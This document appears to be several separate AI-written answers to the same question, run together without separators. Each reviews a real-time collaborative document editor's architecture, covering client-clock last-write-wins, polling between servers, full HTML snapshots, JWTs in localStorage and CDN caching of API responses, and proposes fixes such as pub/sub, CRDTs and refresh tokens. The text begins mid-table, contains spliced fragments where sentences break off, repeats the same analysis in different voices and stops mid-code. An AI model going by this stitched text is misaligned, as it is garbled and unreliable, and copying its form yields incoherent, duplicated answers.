This architecture has solid foundations but leans heavily on a central database and polling, which are common anti-patterns for real-time scaling. Addressing these would make it more robust, but prioritize based on your expected load (e.g., focus on polling if scaling to many servers). If you provide more details (e.g., expected user count), I can refine these further.
| Pro | Con |
|---|---|
| Ensures low-latency broadcasts within server groups | Uneven load distribution (hot servers with popular docs get overloaded) |
| Simple to implement | Single server failure affects all its clients (mitigate with health checks/auto-scaling) |
now() or monotonic server clocks) on write, rejecting or queuing client changes with older timestamps.| Pro | Con |
|---|---|
| Reliable, consistent ordering | Increases round-trip latency (client waits for server ACK before UI update) |
| Easy DB enforcement via unique constraints | Doesn't handle true simultaneous edits (pair with OT/CRDTs for better resolution) |
LISTEN/NOTIFY for pub/sub: on write, server sends NOTIFY on a channel per document/org ID; other servers subscribe and broadcast changes to their WebSocket clients.| Pro | Con |
|---|---|
| Near-real-time (<100ms), low overhead | Each server needs a persistent PG connection (risk of connection pool exhaustion; limit to 1/subscription) |
| No external deps | PG notify doesn't scale to millions of channels (shard channels by org ID) |
| Pro | Con |
|---|---|
| Preserves intent, no data loss | High complexity/debugging (OT requires server-side transformation) |
| Bandwidth-efficient diffs | CRDTs: higher storage (tombstones); OT: causal ordering latency |
| Pro | Con |
|---|---|
| Reduces writes 90%+, linear storage growth | Load time increases for long sessions (mitigate with CDN-cached snapshots) |
| Enables rewind/undo | Computation overhead on reconstruct (offload to workers) |
| Pro | Con |
|---|---|
| XSS-proof | CSRF risk (mitigate with CSRF tokens or double-submit cookies) |
| Works seamlessly with SPA | Slightly higher backend load for refreshes |
?v=timestamp) or short TTL (10s) with PG invalidation triggers pushing to CDN.| Pro | Con |
|---|---|
| Consistent real-time data | Higher backend read load (use PG read replicas) |
| Simple config change | Misses CDN perf for infrequent reads |
| Pro | Con |
|---|---|
| Horizontal scale to 1000s servers, decouples servers | Added latency (10-50ms), new infra cost/reliability |
| Handles hot docs via partitioning | Eventual consistency window (use at-least-once delivery) |
| Pro | Con |
|---|---|
| True write scalability | Cross-shard queries complex (docs stay intra-shard) |
| Leverages existing partitioning | Migration overhead, eventual consistency on sharded joins |
| Pro | Con |
|---|---|
| Resilient to failures | Brief UI freeze during sync (show "Reconnecting..." overlay) |
| Standard (e.g., Socket.io handles) | Bandwidth spike on mass reconnects |
| Pro | Con |
|---|---|
| Zero-downtime auth | Slightly higher CPU for sig validation |
| Simplifies scaling | Revocation harder (shorten JWT expiry + blocklist in Redis) |
| Category | High Impact Issues | Mitigation Priority |
|---|---|---|
| Scaling | Polling, WS stickiness, PG writes | High (blocks >10 servers) |
| Consistency | Timestamps, LWW conflicts | High (core UX breakage) |
| Reliability | No reconnects, Redis single-point | Medium (graceful degradation) |
| Security/Perf | JWT storage, CDN staleness | Medium (exploitable but not critical) |
This covers the major issues; implementing 1-4 + reconnection yields a production-viable system. Total refactors (e.g., OT + Pub/Sub) add 20-50% complexity but enable 10x scale.
Critical Failure Modes, Race Conditions, and Scaling Bottlenecks
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken. Client clocks are not synchronized. A user in Australia with a clock 800ms ahead will consistently win over a user in California.
Solutions:
now() from a single PostgreSQL instance as source of truth.Trade-off: HLC adds complexity but gives causal ordering with low latency. Pure server timestamps require either a single writer per document or distributed consensus.
Problem: Broadcasting raw "changes" with last-write-wins at paragraph level will cause frequent document corruption when two users edit the same paragraph or nearby text.
Solutions:
Trade-off: CRDTs have higher memory/CPU cost and larger payload sizes, but provide eventual consistency without coordination.
Problem: Changes are only broadcast to clients connected to the same server. Other servers poll every 2 seconds. This creates 0-2 second inconsistency windows and "stuttering" UX.
Solutions:
Trade-off: Adds another moving part and latency (usually <50ms), but gives consistent sub-100ms experience.
Problem: Every keystroke from every user in the organization writes to the same PostgreSQL database. This will not scale beyond ~50-100 concurrent active users per document or a few thousand total.
Solutions:
Trade-off: Eventual persistence increases risk of data loss during crashes.
Problem: Storing entire HTML document every 30s creates massive write amplification and makes versioning/history nearly impossible.
Solutions:
Problem: Multiple users can edit the same paragraph with no visual indication or locking strategy.
Solutions: Implement presence (who is typing where) and either:
Problem: Tokens in localStorage are vulnerable to XSS. 24h expiry with no refresh token rotation is bad practice.
Solutions:
Problem: Round-robin without sticky sessions means a user can be reconnected to a different server, losing real-time continuity.
Solutions: Use sticky sessions (by IP or better, by JWT claim) or make WebSocket connections stateless via a pub/sub layer.
Problem: No mention of how clients handle reconnection, missed messages, or offline editing.
Solutions: Implement sequence numbers on operations and allow clients to replay missed changes on reconnect. Consider CRDTs which handle this naturally.
Database:
Memory/CPU per Server:
Redis:
Current architecture will work for demos or very small teams but will fail badly at even moderate scale or with concurrent editing.
The fundamental issues are:
These are not minor issues — they are foundational design flaws in collaborative editing systems.
Here is a comprehensive analysis of the failure modes, race conditions, and scaling bottlenecks in the described architecture.
I have grouped related issues for clarity while preserving all significant problems identified through team collaboration.
Problems:
Solution: Replace polling with Redis Pub/Sub (leveraging the existing Redis instance). When a server writes a change, it publishes the event (keyed by document ID). Other servers subscribe only to documents their clients are actively viewing and forward changes to their WebSocket clients. Use sequence numbers or change IDs for idempotency.
Trade-offs: Adds Redis as a critical real-time path (mitigate with Redis Cluster/Sentinel). Increases operational complexity slightly but dramatically reduces DB load and latency. At extreme scale, may need a more robust broker like Kafka.
Problems:
Solution:
Trade-offs: Server timestamps still have limitations in high-concurrency scenarios. OT/CRDTs require significant frontend and backend changes (data model shift from HTML blobs to rich deltas/positions) but provide correct merging, undo, and history. CRDTs are generally easier to scale than classic OT.
Problems:
Solution: Store a sequence of fine-grained operations/deltas (with periodic snapshots for fast loading). Keep snapshots in S3/object storage and the operation log in PostgreSQL (JSONB) or a specialized store. Implement log compaction.
Trade-offs: Adds complexity in replay/compaction logic and increases initial engineering effort. Significantly improves storage efficiency, versioning, offline support, and scalability. Replay time for very long sessions must be managed.
Problem: CloudFront caching API responses for 5 minutes will serve stale document state and changes, breaking collaboration entirely for cached requests.
Solution: Set explicit Cache-Control: no-store, no-cache, must-revalidate (and Surrogate-Control) headers on all mutable API endpoints. Use the CDN only for static assets (JS, CSS) and long-lived immutable resources.
Trade-offs: Increases origin traffic and cost slightly. This is mostly a configuration fix with minimal downside once implemented correctly.
Problems:
Solution: Configure sticky sessions on the load balancer (using cookies or consistent hashing). Implement client-side reconnection logic that requests the latest document state + missed changes (using sequence numbers). Monitor per-server connection counts and scale proactively. Consider a managed WebSocket service for very high scale.
Trade-offs: Sticky sessions can create hot servers for popular documents. Adds some statefulness to the otherwise stateless tier. Client reconnection logic adds frontend complexity but is essential.
Problems:
Solution: Batch changes where possible. For hot documents, route them to specialized handling (in-memory Redis state + periodic flush) or shard by document ID in addition to organization. Consider purpose-built collaborative backends or event sourcing with Kafka for the write path.
Trade-offs: Increases architecture complexity and eventual consistency window. Document-level sharding complicates cross-document queries.
Problems:
Solution: Use short-lived access tokens combined with refresh tokens stored in HttpOnly cookies. Implement proper token revocation (via Redis blacklist or short expiry). Consider OAuth/social login for better security posture.
Trade-offs: More complex authentication flow and requires CSRF protection for cookies. Significantly improves security.
Problem: A change may be written to PostgreSQL but fail to broadcast (local WS or Pub/Sub), or vice versa, leading to inconsistent views across clients. No idempotency mentioned.
Solution: Use the Outbox Pattern: write the change (and outbound message) in the same database transaction, then have a separate processor publish events. Add unique change IDs and sequence numbers for deduplication.
Trade-offs: Adds some latency and processing overhead. Much more reliable than fire-and-forget.
Additional risks:
Solutions:
Trade-offs: Increases infrastructure cost and operational burden. These are table-stakes for a production collaborative tool.
The most critical issues (in rough order) are:
This architecture can work for very small-scale usage but will fail in reliability, consistency, and performance as soon as there is meaningful concurrent usage across multiple servers.
The team (Enrico, Leo, Hans) contributed to this analysis. The core problems stem from attempting to bolt real-time collaboration onto a traditional request-response architecture without using proven patterns for distributed collaborative editing.
Below is a comprehensive analysis of the provided architecture for a real-time collaborative document editor. I'll identify potential failure modes (events or conditions that could lead to system unavailability, data loss, or incorrect behavior), race conditions (situations where concurrent operations lead to unpredictable or inconsistent outcomes), and scaling bottlenecks (limitations that hinder performance or growth as load increases). For each issue, I'll describe it briefly, explain its impact, propose a specific solution, and discuss trade-offs.
I've grouped the issues by category for clarity. Note that some issues overlap categories (e.g., a failure mode could exacerbate a race condition). The analysis assumes typical real-world constraints like network unreliability, clock drift, and hardware failures, based on the described architecture.
These arise from concurrent user actions, server polling, and timestamp-based conflict resolution, potentially leading to data inconsistency or lost edits.
Client Clock Skew in Last-Write-Wins Conflict Resolution
Timestamps rely on client-side clocks, which can drift or be manually adjusted, causing incorrect ordering of edits. For example, User A (clock 10 minutes ahead) and User B (accurate clock) edit the same paragraph; A's later edit might be deemed "earlier" due to skew, overwriting B's valid change.
Solution: Implement server-side timestamps (e.g., using NTP-synchronized server clocks for each edit). Each change event includes a server-assigned timestamp upon receipt.
Trade-offs: Increases server load for timestamp assignment (minor, as it's a simple operation). Clients must trust the server clock, which could introduce slight latency (e.g., 10-50ms added to edit propagation). Requires handling out-of-order arrivals if network delays occur, but improves accuracy over client clocks.
Delayed Sync Across Servers Due to Polling
Servers poll PostgreSQL every 2 seconds for changes, creating a window where users on different servers see stale data. If User A on Server 1 edits a doc and User B on Server 2 edits the same part within a 2-second window, Server 2 might overwrite A's edit before seeing it.
Solution: Replace polling with a publish-subscribe (pub/sub) mechanism, such as using Redis pub/sub channels per document. Each server publishes changes to the channel upon writing to PostgreSQL, and all servers subscribe to receive notifications instantly.
Trade-offs: Adds complexity (e.g., managing Redis channels and ensuring message ordering). Increases Redis load (though it's lightweight for pub/sub). Eliminates polling's inefficiency but requires handling Redis failures (see failure modes below). Slightly higher latency for initial setup compared to polling.
Intra-Server Broadcasting Only
Changes are broadcast only to WebSocket clients on the same server, but users might be connected to different servers. This can cause temporary inconsistencies: e.g., User A sees an edit, but User B (on another server) doesn't until their server polls and broadcasts, potentially leading to conflicting local edits.
Solution: Use a centralized message broker (e.g., extend Redis pub/sub to include client notifications). Servers subscribe to document-specific channels and relay messages to their WebSockets.
Trade-offs: Centralizes real-time logic, reducing per-server isolation but improving consistency. Increases Redis dependency and potential single-point load (mitigate with Redis clustering). Adds a small hop (server-to-broker-to-server), introducing ~10-20ms extra latency per broadcast.
Conflict Resolution for Complex Edits
Last-write-wins on entire paragraphs (or similar units) doesn't handle granular conflicts, like one user inserting text and another deleting it in the same area. Timestamps might resolve the winner, but the losing edit is discarded entirely, causing data loss.
Solution: Adopt operational transformation (OT) or conflict-free replicated data types (CRDTs) for finer-grained merging. For example, implement a CRDT-based library (e.g., like those in Google Docs) where edits are commutative and can be merged automatically.
Trade-offs: Significantly increases complexity in the frontend and backend (e.g., needing to track operations like insert/delete at character level). Requires more CPU for merging on servers, potentially slowing edits. Improves user experience by preserving most changes, but OT/CRDTs can have edge cases in highly concurrent scenarios.
These could cause downtime, data loss, or incomplete functionality, affecting service reliability.
API Server Failure
If a server crashes, all its WebSocket connections drop, users lose unsaved edits (since snapshots are every 30 seconds), and they must reconnect (potentially to a different server, disrupting sync).
Solution: Implement auto-reconnection with session persistence in Redis (store user state and recent edits). Upon reconnection, replay missed changes from PostgreSQL or a Redis-backed event log.
Trade-offs: Adds Redis overhead for state storage. Ensures continuity but introduces a brief sync delay (e.g., 1-5 seconds) during failover. Requires client-side logic for reconnection, increasing frontend complexity.
Database (PostgreSQL) Failure
Writes fail, halting document saves and syncing. Full snapshots could be lost if a crash occurs mid-save, and polling servers would error out.
Solution: Use PostgreSQL high availability (e.g., with Patroni for automatic failover to replicas) and enable synchronous replication. Add a write-ahead log (WAL) for recovery.
Trade-offs: Increases operational complexity (e.g., managing replicas). Improves uptime but adds latency to writes (due to sync replication, ~20-50ms). Read replicas already help reads, but writes remain centralized.
Redis Failure
Session cache loss could invalidate user sessions prematurely, forcing logins. Pub/sub would break if used, halting cross-server sync.
Solution: Deploy Redis in a cluster with replication and automatic failover (e.g., using Redis Sentinel or Redis Cluster). Persist critical data (e.g., sessions) to PostgreSQL as a fallback.
Trade-offs: Higher setup cost and memory usage. Ensures reliability but doesn't eliminate all risks (e.g., brief outages during failover). Clustering adds network overhead.
WebSocket Disconnection and Network Failures
Clients can disconnect due to network issues, losing edits between snapshots. Round-robin load balancing might route reconnections to different servers, causing sync issues.
Solution: Enable sticky sessions at the load balancer (e.g., via IP hashing or session cookies) to prefer reconnecting to the same server. Add client-side buffering to queue unsaved edits for replay.
Trade-offs: Sticky sessions reduce load balancing efficiency (uneven server load). Improves edit persistence but requires more client state management, increasing memory usage on devices. Buffering adds complexity if conflicts arise during replay.
JWT Expiry and Auth Failures
JWTs expire after 24 hours, logging out users mid-session. LocalStorage storage is vulnerable to clearing (e.g., browser crashes or user actions), causing auth loss.
Solution: Implement refresh tokens: Store a long-lived refresh token in a secure HTTP-only cookie, and use it to auto-renew JWTs without user intervention.
Trade-offs: Enhances security (less exposure in localStorage) and user experience (seamless renewals). Adds server complexity for handling refreshes. Increases attack surface slightly if cookies are compromised.
CDN Caching of API Responses
API responses cached for 5 minutes in CloudFront could serve stale data for non-static requests (e.g., document lists), conflicting with real-time edits.
Solution: Configure cache headers to disable caching for dynamic API endpoints (e.g., use Cache-Control: no-cache for edit-related responses) or use signed URLs for sensitive data.
Trade-offs: Reduces CDN benefits for those endpoints, increasing origin server load. Improves accuracy but might raise costs if more requests hit the backend.
Snapshot-Based Storage Loss
Documents saved as full HTML snapshots every 30 seconds; crashes between saves lose recent edits. No incremental diffing means inefficient storage and recovery.
Solution: Implement incremental versioning with diffs (e.g., store change deltas in PostgreSQL or a separate log table). Use background jobs to compute and store snapshots less frequently.
Trade-offs: Reduces storage costs and improves recovery granularity. Adds computation overhead for diffs (e.g., via libraries like diff-match-patch), potentially delaying saves by 1-2 seconds.
These limit horizontal growth or performance under load, especially with increased users or documents.
Polling-Induced Database Load
Each server polling PostgreSQL every 2 seconds scales poorly; with N servers, it's N queries per interval, overwhelming the DB even with read replicas.
Solution: As noted in race conditions, switch to Redis pub/sub for instant notifications, reducing DB queries to near zero.
Trade-offs: Shifts load to Redis (which is better suited for pub/sub). Eliminates polling waste but requires Redis to handle high message volumes; if not clustered, it becomes a bottleneck.
WebSocket Connection Limits per Server
Each Node.js server handles its own WebSockets, limited by OS/file descriptors (e.g., ~10k-100k per server). Adding servers helps, but uneven user distribution (e.g., many users editing one doc) overloads a single server.
Solution: Use a WebSocket proxy or gateway (e.g., based on Nginx or HAProxy) to distribute connections across servers dynamically, or adopt a shared WebSocket server (e.g., via Socket.IO clustering with Redis adapter).
Trade-offs: Proxy adds a single point of failure and slight latency (~5-10ms). Improves distribution but increases complexity (e.g., ensuring message routing). Clustering shares load but requires coordination.
Centralized Database Writes
All edits write to PostgreSQL master, creating a bottleneck for write-heavy loads (e.g., many concurrent edits). Read replicas help reads but not writes.
Solution: Shard documents across multiple PostgreSQL instances (e.g., by hash of document ID, beyond just org ID). Use a distributed DB like CockroachDB for built-in sharding and replication.
Trade-offs: Greatly improves write scalability. Adds complexity in query routing and cross-shard operations (e.g., harder to aggregate org-wide data). Migration from single PostgreSQL requires downtime or tooling.
Load Balancer and Uneven Distribution
Round-robin balancing doesn't account for connection stickiness or load per server, leading to hotspots (e.g., one server with many active WebSockets).
Solution: Upgrade to a smarter load balancer (e.g., AWS ALB with least-connections algorithm) or use session affinity with health checks.
Trade-offs: Better distribution improves performance. Adds configuration overhead and potential for affinity-related issues (e.g., users stuck on slow servers).
Document Partitioning Limitations
Partitioning by org ID is good for isolation but doesn't prevent bottlenecks within a large org (e.g., one org with 10k users editing the same doc overloads its partition).
Solution: Sub-partition by document ID (e.g., use a hash function to distribute docs across multiple DB shards within an org).
Trade-offs: Enhances parallelism within orgs. Increases routing complexity (e.g., needing a lookup service for shard locations). Requires careful key design to avoid hotspots.
Resource Intensity of Broadcasting
Broadcasting changes to all clients on a server scales poorly for large documents (e.g., 100 users on one server means 100 messages per edit).
Solution: Implement selective broadcasting (e.g., only send to clients viewing the edited section) using client-reported viewports or subscription models.
Trade-offs: Reduces network and CPU load per edit. Requires more client-server communication (e.g., viewport updates), adding slight overhead. May miss edge cases if viewports aren't accurately tracked.
This architecture has solid foundations (e.g., horizontal scaling and partitioning), but real-time collaboration demands tight consistency and low latency—many issues stem from the polling-based sync and client-reliance. Prioritizing fixes like server-side timestamps and pub/sub would address core races and bottlenecks. If implemented, thorough testing (e.g., with simulated failures and load) is essential. Let me know if you'd like deeper dives into any solution!
Issue: When Server A broadcasts changes only to its connected clients, users on Server B don't see updates until polling occurs (2-second delay). This creates a "split-brain" experience where collaborators see different document states.
Solution: Implement a pub/sub layer using Redis Pub/Sub or Kafka.
Issue: Two users edit the same paragraph simultaneously. User A's change arrives at 10:00:01.000, User B's at 10:00:01.001. User A's change is overwritten even if User B started typing first but had network lag.
Solution: Operational Transformation (OT) or CRDTs
Issue: Client clocks can be off by seconds or minutes. A user with a fast clock could "future-stamp" changes, causing valid edits to be rejected.
Solution: Hybrid Logical Clocks (HLC)
Issue: 100 servers polling PostgreSQL every 2 seconds = 50 queries/second just for change detection. At scale, this overwhelms the database.
Solution: Change Data Capture (CDC) with Debezium
Issue: For 10,000 active documents, that's 333 full writes/second to PostgreSQL. Each snapshot is ~50KB = 16MB/s write throughput.
Solution: Incremental Snapshots + Operation Log
Issue: Each server can handle ~50,000 WebSocket connections (Node.js). At 100,000 concurrent users, need 2+ servers, but users on different servers can't collaborate in real-time.
Solution: WebSocket Gateway Layer
Issue: CloudFront caching API responses for 5 minutes means users see stale document lists and permissions.
Solution: Cache-Control Headers + Versioned URLs
Cache-Control: private, max-age=0 for user-specific dataIssue: Stolen token grants 24 hours of access. No revocation mechanism.
Solution: Short-lived tokens + Refresh tokens
Issue: User A deletes a paragraph while User B edits it. Last-write-wins might delete User B's edits.
Solution: Intent-based Operations
Issue: All writes go to primary PostgreSQL. If it fails, system is read-only.
Solution: Multi-Master with Conflict Resolution
Issue: Network failure = no editing. Changes since last snapshot are lost.
Solution: Local Operation Queue + Sync Protocol
Current: Client → API Server → PostgreSQL
API Server → WebSocket Clients (same server only)
Improved:
1. Client → Load Balancer → API Server (business logic)
2. API Server → Redis Streams (operations log)
3. Redis Streams → All WebSocket Gateway Servers
4. WebSocket Gateway → All connected clients
5. CDC (Debezium) → Kafka → API Servers (for sync)
6. Snapshot Service → PostgreSQL (periodic full saves)
The architecture has good fundamentals but needs these enhancements for production readiness at scale. The most critical gap is the lack of real-time synchronization between servers, which would cause immediate user-visible inconsistencies.
This is a fascinating architecture with several critical flaws that would manifest at scale. Let me break down the issues systematically.
Issue: Last-write-wins with client timestamps is fundamentally broken. Clients have unsynchronized clocks (± seconds), network delays add variable latency, and malicious users could manipulate timestamps.
Example: User A (clock 2s fast) and User B (clock 2s slow) edit simultaneously. User B's edit arrives first at the server but has an earlier timestamp, so User A's later edit "wins" even though it was made earlier in real time.
Solution: Use hybrid logical clocks (HLC) or vector clocks. Each server assigns monotonically increasing logical timestamps that combine wall-clock time with sequence numbers.
Trade-off: Slightly more complex conflict resolution logic, but eliminates clock skew issues entirely.
Issue: With 2-second polling intervals, servers have inconsistent views of document state for up to 2 seconds. Two users connected to different servers could make conflicting edits that both appear valid locally.
Example:
Solution: Implement distributed locks or optimistic concurrency control with version numbers. Each document edit should include the version it was based on.
Trade-off: Increased latency for conflict detection, potential for more edit rejections.
Issue: All writes go to a single PostgreSQL primary. With many concurrent editors, this becomes a severe bottleneck. The 30-second full HTML snapshots will cause massive I/O spikes.
Example: 1000 users editing different documents = 1000 writes/second to PostgreSQL, plus 33 full document writes/second for snapshots.
Solution:
Trade-off: More complex recovery procedures, potential for data loss if queue fails.
Issue: Load balancer uses round-robin, but WebSocket connections are sticky. Users on the same document might connect to different servers, creating synchronization islands.
Solution: Consistent hashing based on document ID, or a pub/sub layer (Redis Pub/Sub) for cross-server communication.
Trade-off: Consistent hashing reduces load balancing flexibility. Pub/Sub adds network hops.
Issue: Caching API responses for 5 minutes is disastrous for a real-time editor. Users will see stale document content.
Solution: Only cache static assets. API responses should have Cache-Control: no-store.
Trade-off: Higher origin load, but correctness is non-negotiable.
Issue: If a WebSocket drops mid-edit, the user's changes are lost. No acknowledgment mechanism exists.
Solution: Client-side change queue with acknowledgments. Changes persist locally until confirmed by server.
Trade-off: More complex client logic, potential for duplicate edits if not handled carefully.
Issue: PostgreSQL failover (even with replicas) can lose recent writes. The 30-second snapshot interval means up to 30 seconds of edits could vanish.
Solution: Synchronous replication to at least one standby, or use a distributed database (CockroachDB, YugabyteDB).
Trade-off: Synchronous replication increases write latency. Distributed databases have different consistency models.
Issue: JWTs in localStorage are vulnerable to XSS attacks. A single XSS vulnerability compromises all user sessions.
Solution: Use HTTP-only cookies with CSRF protection. Implement short-lived tokens with refresh tokens.
Trade-off: More complex auth flow, potential CSRF vulnerabilities if not implemented correctly.
Issue: Last-write-wins is the simplest but worst conflict resolution for collaborative editing. It causes frequent data loss.
Solution: Implement OT (Operational Transformation) or CRDTs for true collaborative editing.
Trade-off: Significantly more complex implementation, higher CPU/memory usage.
Issue: Users might read from replicas that are behind the primary, seeing outdated document versions while trying to edit.
Solution: Session consistency - direct a user's reads to the replica that has their writes, or use read-after-write consistency guarantees.
Trade-off: Reduced read scalability, more complex routing.
1. Use CRDTs (like Yjs or Automerge) for conflict resolution
2. Implement WebSocket gateway with Redis Pub/Sub for cross-server sync
3. Use change streams (MongoDB) or logical decoding (PostgreSQL) instead of polling
4. Store document deltas, not full snapshots
5. Implement proper write-ahead logging with idempotent operations
6. Use HTTP-only cookies for auth with refresh token rotation
7. Add client-side operation queue with acknowledgments
8. Implement proper monitoring for sync lag and conflict rates
The most critical issues to address immediately are:
Without these changes, this system would lose user data regularly and become increasingly inconsistent as it scales.
Issue: Users may experience interruptions due to unstable networks or server load balancer timeouts. Solution: Implement automatic reconnection logic with exponential backoff on the client side. Additionally, maintain an operational state in IndexedDB for offline operations, then sync when reconnected. Enhanced connection monitoring with heartbeat messages can detect failures early. Trade-offs: Increased client complexity and potential duplication of operations during reconnects that need reconciliation.
Issue: The primary PostgreSQL database represents a single point of failure. Solution: Set up a synchronous standby replica in a different availability zone that can take over immediately. Implement database connection pooling to manage connections efficiently. Use a circuit breaker pattern to handle database failures gracefully. Trade-offs: Synchronous replication adds some latency but provides stronger data consistency guarantees.
Issue: Redis failure could lead to session data loss and user disruption. Solution: Deploy Redis in a clustered configuration with replication. Implement a cache warming strategy to speed up recovery. Fall back to database lookups for critical data. Trade-offs: Increased infrastructure complexity but improved resilience.
Issue: During network partitions, different server instances might accept conflicting changes to the same document. Solution: Implement a consensus protocol like Raft to decide which server instance is the leader during partitions. Define a conflict resolution policy with explicit user notification. Implement partition detection using distributed coordination services like ZooKeeper. Trade-offs: Increased system complexity but improved consistency during network issues.
Issue: Unexpected crashes could cause in-flight changes to be lost. Solution: Implement an operational change queue that persists pending operations to disk. Persist document changes to a write-ahead log before acknowledging them. Implement a document versioning system to allow reconstruction of document state after server restarts. Trade-offs: Increased storage requirements but improved data integrity.
Issue: Last-write-wins with timestamps can lead to data loss if two users edit the same paragraph at the same time. Solution: Implement operational transformation (OT) or conflict-free replicated data types (CRDTs) to handle concurrent edits intelligently. These algorithms can merge changes without data loss. Additionally, implement an undo/redo mechanism with branching to allow users to revert changes if needed. Trade-offs: Increased computational complexity but significantly improved user experience by preserving all edits.
Issue: Client clock skew can cause conflict resolution inconsistencies. Solution: Use vector clocks instead of simple timestamps to establish partial ordering of events. Record timestamps from multiple clients and servers. Implement a bounded clock skew tolerance with a hybrid logical clock mechanism. Trade-offs: Increased complexity but correct resolution of concurrent edits despite clock skew.
Issue: During the 2-second polling interval, servers might have outdated document states. Solution: Implement an inter-server communication mechanism using a message queue like RabbitMQ or Apache Kafka. Changes should be fanned out to all servers immediately rather than relying on polling. For truly real-time consistency, maintain server-to-server WebSocket connections. Trade-offs: Increased infrastructure complexity but reduced synchronization delay.
Issue: The mechanism of saving full HTML snapshots every 30 seconds could overwrite more recent changes. Solution: Implement an operational log that records each change as it occurs. The snapshot should only be considered a savepoint, not the sole storage mechanism. Create snapshots only when the document is idle for at least 30 seconds. Store snapshots as differential patches instead of full HTML. Trade-offs: Increased storage complexity but reduced risk of data loss.
Issue: As the system scales, the primary PostgreSQL database will become a bottleneck due to connection limits. Solution: Implement database connection pooling. Use read replicas for read-heavy operations. Consider partitioning the database by organization ID to distribute the load. Trade-offs: Increased complexity but improved throughput and reduced contention.
Issue: The current polling-based cross-server synchronization will become inefficient at scale. Solution: Use a distributed message queue (RabbitMQ, Apache Kafka) for inter-server communication. When a change occurs, fan it out to all servers via the message queue rather than relying on polling. Implement an event-driven architecture for change propagation. Trade-offs: Increased infrastructure complexity but reduced polling overhead and improved real-time consistency.
Issue: Storing full HTML snapshots every 30 seconds consumes significant memory. Solution: Store only changes in a sequential log structure. Reconstruct document state on demand. Implement a retention policy where only recent snapshots are kept in memory. Trade-offs: Increased complexity but reduced storage requirements and improved performance.
Issue: As documents become popular, a single server instance might be overwhelmed by WebSocket connections. Solution: Implement connection draining to redistribute connections when servers are under heavy load. Consider sharding documents across multiple servers based on document ID rather than server count alone. Implement a pub/sub pattern for broadcasting changes to clients. Trade-offs: Increased complexity but improved load distribution and scalability.
Issue: Caching API responses for 5 minutes could lead to stale document data. Solution: Implement cache invalidation via publish-subscribe when documents change. Set shorter cache TTLs for frequently changing documents, longer for stable ones. Implement conditional requests with ETags to reduce stale data risk. Trade-offs: Increased complexity but improved data freshness.
This architecture analysis reveals several critical issues that need to be addressed. The most critical are the potential data loss from last-write-wins conflict resolution, the single point of failure in the database, and the race conditions introduced by client clock skew.
Implementing operational transformation or CRDTs should be a top priority to ensure data consistency. The database layer needs high availability configuration, and the inter-server communication should be moved from polling to event-driven mechanisms.
For scaling, document sharding strategies and moving to event-driven cross-server synchronization will be essential. The architecture is generally sound but requires these enhancements to be production-ready.
Issue: With round-robin load balancing, users editing the same document might connect to different servers, creating significant sync delays.
Scenario:
Solution: Implement Document-Affinity Routing
Issue: Client clocks are unreliable, causing incorrect conflict resolution.
Scenario:
Solution: Implement Vector Clocks + Server Sequencing
(clientId, clientTimestamp, serverSequenceNumber)serverSequenceNumber has final authorityIssue: Broadcasting only to connected WebSocket clients creates inconsistent views.
Scenario:
Solution: Operational Transform (OT) with Redis Pub/Sub
transform → apply → broadcastIssue: Storing full HTML every 30 seconds is extremely inefficient.
Scenario:
Solution: Operational Log + Delta Compression
Issue: Every keystroke hits PostgreSQL, creating write pressure.
Scenario:
Solution: Write-Through Cache Pattern
SET doc:operations:<docId> <operations>Issue: XSS attacks can steal tokens, 24-hour expiry is too long.
Solution: Token Rotation + HttpOnly Cookies
Issue: 5-minute cache on API responses breaks real-time collaboration.
Scenario:
Solution: Cache-Control Headers
Cache-Control: no-cache, no-store, must-revalidate for APIIssue: Each WebSocket connection consumes ~2MB memory.
Scenario:
Solution: WebSocket Connection Pooling
Issue: PostgreSQL has hard connection limits (typically 100-200).
Scenario:
Solution: Connection Pooling + PgBouncer
Issue: Redis failure breaks session cache and inter-server sync.
Solution: Redis Sentinel + Partition Tolerance
Issue: Server restart causes thousands of simultaneous reconnections.
Solution: Exponential Backoff + Sticky Sessions
graph TD
A[React SPA] --> B[API Gateway<br/>with WS routing]
B --> C[Document Router<br/>Consistent Hashing]
C --> D[Node.js Server<br/>Document Shard 1]
C --> E[Node.js Server<br/>Document Shard 2]
D --> F[Redis Stream<br/>Operations Log]
E --> F
F --> G[Compaction Service<br/>PostgreSQL Writer]
G --> H[PostgreSQL<br/>Document Store]
D --> I[Redis Pub/Sub<br/>Cross-server sync]
E --> I
J[CDN] --> K[Static Assets<br/>No API caching]
| Priority | Issue | Solution | Effort | Impact |
|---|---|---|---|---|
| P0 | Client timestamps | Vector clocks + server sequencing | Medium | Critical |
| P0 | Storage inefficiency | Operational log + delta compression | High | Critical |
| P1 | Cross-server sync | Redis Pub/Sub for real-time | Medium | High |
| P1 | JWT security | Token rotation + HttpOnly | Medium | High |
| P2 | Connection balancing | Document affinity routing | High | Medium |
| P2 | Database writes | Write-through cache pattern | Medium | Medium |
| P3 | CDN caching | Cache-control headers | Low | Low |
This architecture transforms the system from a brittle prototype to a production-ready, Google Docs-level collaborative editor.
Problem: Changes only broadcast to clients connected to the same server. Clients on other servers must wait up to 2 seconds for polling.
Solution: Implement Redis Pub/Sub for cross-server communication
// When a server receives a change
redisClient.publish(`document:${docId}:changes`, JSON.stringify(change));
redisClient.subscribe(`document:${docId}:changes`);
Trade-offs:
Problem: Last-write-wins based on client timestamps is unreliable (clock skew, malicious clients).
Solution: Implement Operational Transformation (OT) or CRDTs
// Example OT implementation
class OperationalTransform {
static transform(op1, op2) {
if (op1.position <= op2.position) {
return { ...op2, position: op2.position + op1.length };
}
return op2;
}
}
Trade-offs:
Problem: Full HTML snapshots every 30 seconds can overwrite concurrent changes.
Solution: Implement versioned storage with branching
CREATE TABLE document_versions (
id SERIAL PRIMARY KEY,
document_id UUID,
version INT,
parent_version INT,
content TEXT,
created_at TIMESTAMP,
merged BOOLEAN DEFAULT FALSE
);
Trade-offs:
Problem: Multiple servers writing to PostgreSQL simultaneously.
Solution: Implement optimistic locking
ALTER TABLE documents ADD COLUMN version INT DEFAULT 1;
UPDATE documents
SET content = :newContent, version = version + 1
WHERE id = :docId AND version = :expectedVersion;
Trade-offs:
Problem: 24-hour JWT tokens in localStorage are vulnerable to XSS attacks.
Solution: Implement refresh token rotation
// Use httpOnly cookies for refresh tokens
// Short-lived access tokens (15 minutes)
// Rotate refresh tokens on each use
Trade-offs:
Problem: Every keystroke writes to PostgreSQL, creating write amplification.
Solution: Implement write-through cache with batching
// Buffer changes in Redis
const changeBuffer = new Map();
setInterval(async () => {
if (changeBuffer.size > 0) {
